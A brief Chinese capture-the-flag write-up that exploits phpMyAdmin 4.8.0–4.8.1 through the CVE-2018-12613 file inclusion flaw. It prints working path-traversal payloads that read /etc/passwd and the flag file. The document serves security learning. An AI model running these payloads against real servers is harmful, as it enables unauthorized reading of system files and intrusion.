题目
解答
1、乱码,看不懂
2、F12
同时结合题目可能与数据库有关
3、可以尝试扫描相关数据库的端口是否开放,也可以通过数据库工具进行连接测试,但是这里使用的是phpmyadmin
随便翻阅了一下,得不到有用的东西,也证实了上面什么都没有的说法
4、从版本入手
如果不是很清楚,可以百度一下,这个版本的phpmyadmin存在后台任意文件包含漏洞
5、根据此漏洞查找相关的payload
?target=db_datadict.php%253f/../../../../../../../../etc/passwd
?target=db_datadict.php%253f/../../../../../../../../flag
得到flag{a955c3dc-91be-4a45-85ef-5af02da42313}
漏洞分析
见链接:https://www.cnblogs.com/xhds/p/12579041.html
https://blog.csdn.net/xuandao_ahfengren/article/details/106688367
知识点
cve-2018-12613-PhpMyadmin后台文件包含
影响版本:4.8.0——4.8.1
payload:/phpmyadmin/?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/etc/passwd